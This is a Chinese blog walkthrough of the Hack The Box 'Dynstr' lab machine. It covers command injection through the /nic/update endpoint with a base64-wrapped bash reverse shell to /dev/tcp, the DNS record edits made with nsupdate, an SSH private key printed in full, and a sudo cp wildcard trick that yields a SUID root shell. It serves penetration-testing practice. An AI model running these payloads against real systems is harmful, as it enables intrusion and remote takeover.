Hackthebox Dynstr

最新推荐文章于 2023-12-18 16:56:48 发布
最新推荐文章于 2023-12-18 16:56:48 发布
阅读量486 收藏
点赞数
分类专栏: 靶机 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45208900/article/details/120579129
版权

连接vpn后进行nmap端口扫描
发现 80 53 22
在这里插入图片描述

先看80端口 发现一个账号密码 以及三个dns
那先将dns写入hosts文件
echo “10.10.10.244 dnsalias.htb dynamicdns.htb no-ip.htb dyna.htb dynstr.htb” >> /etc/hosts
然后 我用dirsearch 以及dirb的大字典 搜出了/nic/目录
python3 disearch.py -u http://10.10.10.244 -w /usr/share/dirb/wordlists/big.txt

在这里插入图片描述
在这里插入图片描述

然后继续在nic目录的基础上搜索 发现了update
访问后看到badauth

getshell方法
你对http://10.10.10.244/nic/update这个地址抓包
构造反弹语句
/bin/bash -c ‘bash -i >& /dev/tcp/ip/端口 0>&1’
/nic/update?hostname=$(echo+你构造的反弹shell语句的base64编码+|+base64±d+|+bash)"这里随便填个他的子域名&myip=你的ip
下面要填写这个东西Authorization: Basic ZHluYWRuczpzbmRhbnlk
相当于填写账号密码吧 你访问80端口的时候会看到下面给了你一个账号密码
你把这个账号密码 按这个格式 账号:密码 进行base64编码
你在线解码看看就知道是什么了
解码ZHluYWRuczpzbmRhbnlk

你这个包发burp重放模块里 每次翻车了 就重新监听 然后重发一次 就能很方便地再次拿shell

上述内容参考资料如下
https://www.noip.com/integrate/response
https://help.dyn.com/remote-access-api/return-codes/

弹回来后拿到一个www-data的权限
在这里插入图片描述

那我们打htb的思路 一般是要拿user的flag 再拿root
所以进/home目录
发现俩用户
分别查看俩用户的目录就会发现
bindmgr用户存在user.txt
那么我们现在的思路就是得到bindmgr的权限
www-data -> bindmgr -> dyna
在 /home/bindmgr/support-case-C62796521/目录里随便翻东西 随便打开 你会发现
ssh私钥
这个时候我以为搞定了
直接拿ssh -i id_rsa 用户名@ip去试
在这里插入图片描述

这让你输密码 这肯定不对啊 失败了
重新思考一下 看了一下这个文章
https://www.thegeekstuff.com/2014/01/install-dns-server/
从开头遇到了dns相关的内容推测
也许我们的IP不在dns相关区域中 需要手工添加
在authorized_keys文件中 它只允许符合主机名“*.infra.dyna.htb”的客户端使用该密钥进行身份验证
现在 我们去翻一下网站目录 /var/www/html 然后这里面 应该是nic目录里面有个update
仔细看会发现可以看到nsupdate与密钥一起使用/etc/bind/ddns.key
那么现在就去/etc/bind目录
把infra.key添加到DNS记录
这里你可能会问 为什么不用ddns.key
在这里插入图片描述

原因是用不了啊 所以只能用infra.key
nsupdate -k /etc/bind/infra.key
update add 随便写个东西.infra.dyna.htb 86400 A 你的ip
此行为空格 下一行的IP为D.C.B.A格式,也就是把我们的IP反过来
update add 你ip反着写.in-addr.arpa. 300 PTR 和上面那个保持一致.infra.dyna.htb
比如这个样子
update add 3.16.10.10.in-addr.arpa. 300 PTR qwq.infra.dyna.htb
send
quit

ssh -i id_rsa bindmgr@dyna.htb

不出意外的话 你现在应该就能登录上去了

这里的秘钥我建议你把那个带换行符的字符串 丢c语言的输出语句里比如

#include<stdio.h>
int main(){
printf("-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAxeKZHOy+RGhs+gnMEgsdQas7klAb37HhVANJgY7EoewTwmSCcsl1\n42kuvUhxLultlMRCj1pnZY/1sJqTywPGalR7VXo+2l0Dwx3zx7kQFiPeQJwiOM8u/g8lV3\nHjGnCvzI4UojALjCH3YPVuvuhF0yIPvJDessdot/D2VPJqS+TD/4NogynFeUrpIW5DSP+F\nL6oXil+sOM5ziRJQl/gKCWWDtUHHYwcsJpXotHxr5PibU8EgaKD6/heZXsD3Gn1VysNZdn\nUOLzjapbDdRHKRJDftvJ3ZXJYL5vtupoZuzTTD1VrOMng13Q5T90kndcpyhCQ50IW4XNbX\nCUjxJ+1jgwAAA8g3MHb+NzB2/gAAAAdzc2gtcnNhAAABAQDF4pkc7L5EaGz6CcwSCx1Bqz\nuSUBvfseFUA0mBjsSh7BPCZIJyyXXjaS69SHEu6W2UxEKPWmdlj/WwmpPLA8ZqVHtVej7a\nXQPDHfPHuRAWI95AnCI4zy7+DyVXceMacK/MjhSiMAuMIfdg9W6+6EXTIg+8kN6yx2i38P\nZU8mpL5MP/g2iDKcV5SukhbkNI/4UvqheKX6w4znOJElCX+AoJZYO1QcdjBywmlei0fGvk\n+JtTwSBooPr+F5lewPcafVXKw1l2dQ4vONqlsN1EcpEkN+28ndlclgvm+26mhm7NNMPVWs\n4yeDXdDlP3SSd1ynKEJDnQhbhc1tcJSPEn7WODAAAAAwEAAQAAAQEAmg1KPaZgiUjybcVq\nxTE52YHAoqsSyBbm4Eye0OmgUp5C07cDhvEngZ7E8D6RPoAi+wm+93Ldw8dK8e2k2QtbUD\nPswCKnA8AdyaxruDRuPY422/2w9qD0aHzKCUV0E4VeltSVY54bn0BiIW1whda1ZSTDM31k\nobFz6J8CZidCcUmLuOmnNwZI4A0Va0g9kO54leWkhnbZGYshBhLx1LMixw5Oc3adx3Aj2l\nu291/oBdcnXeaqhiOo5sQ/4wM1h8NQliFRXraymkOV7qkNPPPMPknIAVMQ3KHCJBM0XqtS\nTbCX2irUtaW+Ca6ky54TIyaWNIwZNznoMeLpINn7nUXbgQAAAIB+QqeQO7A3KHtYtTtr6A\nTyk6sAVDCvrVoIhwdAHMXV6cB/Rxu7mPXs8mbCIyiLYveMD3KT7ccMVWnnzMmcpo2vceuE\nBNS+0zkLxL7+vWkdWp/A4EWQgI0gyVh5xWIS0ETBAhwz6RUW5cVkIq6huPqrLhSAkz+dMv\nC79o7j32R2KQAAAIEA8QK44BP50YoWVVmfjvDrdxIRqbnnSNFilg30KAd1iPSaEG/XQZyX\nWv//+lBBeJ9YHlHLczZgfxR6mp4us5BXBUo3Q7bv/djJhcsnWnQA9y9I3V9jyHniK4KvDt\nU96sHx5/UyZSKSPIZ8sjXtuPZUyppMJVynbN/qFWEDNAxholEAAACBANIxP6oCTAg2yYiZ\nb6Vity5Y2kSwcNgNV/E5bVE1i48E7vzYkW7iZ8/5Xm3xyykIQVkJMef6mveI972qx3z8m5\nrlfhko8zl6OtNtayoxUbQJvKKaTmLvfpho2PyE4E34BN+OBAIOvfRxnt2x2SjtW3ojCJoG\njGPLYph+aOFCJ3+TAAAADWJpbmRtZ3JAbm9tZW4BAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n");
}
这样可以自动把换行符给输出 很方便
然后再登录 登录上去后 sudo -l
(ALL) NOPASSWD: /usr/local/bin/bindmgr.sh

你会发现这个东西

为了节省时间 我直接告诉你这个指令存在的漏洞 你只需要定位到他cp相关的那部分
cat /usr/local/bin/bindmgr.sh | grep cp
输出结果
cp .version * /etc/bind/named.bindmgr/
这里我直接进行过滤了 只留重要的部分 如果你想慢慢看可以删去后面的过滤
注意这句话哈 这个意思是使用这个指令就会把当前目录下的version和其他文件一起复制到目录/etc/bind/named.bindmgr/
那么我的建议是
在你当前用户目录下这样操作
echo 随便写个数 > .version
cp /bin/bash .
chmod +s bash

把suid权限的bash丢过来
按理来说直接运行哪个指令 就可以跑去复制的目录执行拿到这个root了
但实际上 你会发现bash复制过去后s权限就丢了
所以你需要加上这个
echo “” > --preserve=mode
你可以在当前目录再弄个这样的文件 细节原理建议直接谷歌
然后就可以保留权限的情况下丢bash过去
现在 执行sudo /usr/local/bin/bindmgr.sh
再跑到那个目录下执行
/etc/bind/named.bindmgr/bash -p
搞定
在这里插入图片描述

qwq 233
关注
专栏目录
【openwrt-21.02】T750 增加readelf指令支持及readelf指令说明
wgl307293845的博客
10-08 659
or deeper。
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】004 - u-boot.lds 链接脚本源码 逐行深度解析
最新发布
|~~~热爱生活、努力学习的小伙汁~~~|
06-02 148
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】004 - u-boot.lds 链接脚本源码 逐行深度解析
Hack the Box Dynstr 靶机渗透
Shadow的博客
07-26 601
Dynstr 靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-25 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 查看80端口,发现是dns的机器,而且还有用户名密码 先将dns写入hosts文件 echo "10.10.10.244 dnsalias.htb dynamicdns.htb no-ip.htb dyna.h.
HackTheBox-dynstr WP
h1nt的博客
10-19 2415
0x01 端口探测 使用nmap对靶机端口进行探测: nmap -sV -sC 10.10.10.244 结果如下,除了传统的22和80端口外,还有一个不同寻常的53端口(从后面的渗透过程来看,可以说整个Box都围绕这个端口展开: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-08 21:57 CST Nmap scan report for 10.10.10.244 Host is up (0.56s latency). Not shown:
ELF中与动态链接相关的段
啊渊的专栏
08-29 606
该段与 “.symtab”段类似,但只保存了与动态链接相关的符号,很多时候,ELF文件同时拥有 .symtab 与 .synsym段,其中 .symtab 将包含 .synsym 中的符号。该段是 .dynsym 段的辅助段,.dynstr 与 .dynsym 的关系,类比与 .symtab 与 .strtab 的关系。在动态链接下,需要在程序运行时查找符号,为了加快符号查找过程,增加了辅助的符号哈希表,功能与 .dynstr 类似。对函数引用的修正,其所修正的位置位于 “.got.plt”...
ELF文件结构
这是一个c++热爱者的博客哟
12-18 1103
可重定位文件需要包含描述如何修改节内容的相关信息,从而使可执行文件和共享目标文件能够保存进程的程序镜像所需要的正确信息。重定位表是进行重定位的重要依据。
so文件中重要的Section--符号表、字符串表、重定位表
zhangmiaoping23的专栏
12-17 7110
转:https://blog.csdn.net/feglass/article/details/51469511 下面我们分析一些so文件中重要的Section,包括符号表、重定位表、GOT表等。 -符号表(.dynsym) 符号表包含用来定位、重定位程序中符号定义和引用的信息,简单的理解就是符号表记录了该文件中的所有符号,所谓的符号就是经过修饰了的函数名或者变量名,不同的编译器有不同的修饰规则。例如符号_ZL15global_static_a,就是由global_static_a变量名经过修饰而来。
【Linux0.11代码分析】09 之 ELF可执行程序02 - Section Headers解析
|~~~热爱生活、努力学习的小伙汁~~~|
05-22 717
【Linux0.11代码分析】09 之 ELF可执行程序02 - Section Headers解析
Linux tracing之内核vsyscall&vdso机制分析
tugouxp的专栏
06-27 927
由于内核运行在受保护的地质空间上,Linux系统中的用户空间程序无法直接执行内核代码,不能直接调用内核空间中的函数,因此,应用程序以某种方式通知系统,告诉内核自己需要执行一function,希望系统系统切换到内核态,这样内核就可以代表应用程序在内核空间执行系统调用。这个道理就像机场的安检通道,旅客只能通过有限的几个通道进入,并且还要经过严格的安全检查。
【C语言扫盲】关键字static究竟限制了谁?
一个专注于嵌入式IoT领域的架构师,深耕IoT领域多年,深度掌握IoT领域的相关技术栈,包括但不限于RTOS内核的实现及其移植、硬件驱动移植开发、网络通讯协议开发、编译构建原理及其实现、底层汇编及编译原理、编译优化及代码重构、嵌入式IoT系统的架构设计等。
07-24 8280
这是一个有趣的话题,虽然说教科书给了你一些说法,但你真正能把static说清楚吗?本文将通过一个案例,给大家做一个深度的拆解分析。
HackTheBox-Oopsie
LYJ20010728的博客
07-27 593
HackTheBox-Oopsie连接配置信息搜集路径泄露网页登陆越权文件上传反弹webshell升级shell横向移动提权下一场景相关信息 连接配置 参考之前写的连接配置,文章链接 信息搜集 Kali中使用Nmap进行扫描:nmap -sS -A 10.10.10.28 ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS -A 10.10.10.28 [sudo] password for kali: Starti
Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)
冬萍子癸水
04-07 754
nmap搞起 显示forum.htb,恩,加到/etc/host 里去 10.10.10.81 forum.htb 就一个80端口,进去看看网页, 没啥,ctrl+u看网页源码 有他们好几个员工的邮箱,这些可以用来做登录信息,但是现在还没发现哪里登录 于是,搜起,过程很慢,搜到monitor 进去就是登录框, 可以试试那几个员工信息,在forget passwords里,随便输入个,当然不行...
渗透测试练习靶场hackthebox_Oopsie
qq_45951598的博客
03-31 2157
文章目录扫描路径泄露登录升级shell权限提升后续总结 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -sS -F -sV 10.10.10.28 -sS:半开扫描,Nmap发送SYN包到远程主机,不建立完整的三次握手 -F:快速扫描,扫描一些常用端口 -sV:探测开启的端口来获取服务、版本信息 如图所示,发现其开放了22和80端口,接下来我们用浏览器进入网站(10.10.10.28:80)进行检查 路径泄露 方法一 这里他说要登入,但是我们这里不知道登入口在哪 发现可以登录,但是目前没有
ELF文件格式解析
热门推荐
Flass Blog
05-21 4万+
ELF文件格式说明。
linux二进制分析笔记-ELF节头(section header)
HotIce0
08-08 3615
ELF节头(section header) ELF节头定义 ELF节类型 .bss .comment .data &amp;amp;amp;&amp;amp;amp; .data1 .debug .dynamic .hash .line .note .rodata &amp;amp;amp;&amp;amp;amp; .rodata1 .shstrtab .strtab .symtab .text .plt .got.plt .dynsym .dynstr...
ROP高级用法之ret2_dl_runtime_resolve
钞sir的博客
04-29 1万+
简介 程序想要调用其他动态链接库的函数,必须要在程序加载的时候动态链接;在一个程序运行过程中,可能很多函数在程序执行完时都不会用到,比如一些错误处理函数或者一些用户很少用到的功能模块;所以ELF采用一种叫做延迟绑定(Lazy Binding)的做法,基本思想就是当函数第一次被用到的时候才进行绑定(符号查找、重定位等); 而在linux 中是利用_dl_runtime_resolve(link_ma...
基于对so中的函数加密技术实现so加固
xiziyunqi的博客
09-12 814
一、技术原理这篇和之前的那篇文章唯一的不同点就是如何找到指定的函数的偏移地址和大小在so文件中,每个函数的结构描述是存放在.dynsym段中的。每个函数的名称保存在.dynstr段中的,类似于之前说过的每个section的名称都保存在.shstrtab段中,所以在前面的文章中我们找到指定段的时候,就是通过每个段的sh_name字段到.shstrtab中寻找名字即可,而且我们知道.shstrtab这个
Android逆向之旅---基于对so中的函数加密技术实现so加固
weixin_30384217的博客
11-21 388
一、前言今天我们继续来介绍so加固方式,在前面一篇文章中我们介绍了对so中指定的段(section)进行加密来实现对so加固http://blog.csdn.net/jiangwei0910410003/article/details/49962173这篇文章我们延续之前的这篇文章来介绍一下如何对函数进行加密来实现加固,当然这篇文章和前篇文章有很多类似的地方,这里就不做太多的解释了,所以还请阅...
ELF动态库符号表修改指南
`.dynstr`节则存储了符号的名称,通常是函数名。ELF文件头提供了整个文件的基本信息,如程序头表和节头表的位置、数量以及大小等。 修改动态库符号表的过程通常涉及以下步骤: 第一步:读取ELF文件头,获取关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值